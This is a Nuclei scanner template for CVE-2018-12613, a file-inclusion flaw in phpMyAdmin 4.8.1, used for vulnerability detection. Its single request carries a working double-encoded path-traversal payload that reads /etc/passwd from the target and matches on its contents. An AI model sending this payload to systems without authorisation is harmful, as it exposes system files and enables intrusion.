nuclei-templates/cves/2018/CVE-2018-12613.yaml

26 lines
537 B
YAML

id: CVE-2018-12613
info:
name: PhpMyAdmin 4.8.1 Remote File Inclusion
author: pikpikcu
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
tags: cve,cve2018,phpmyadmin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body
- type: status
status:
- 200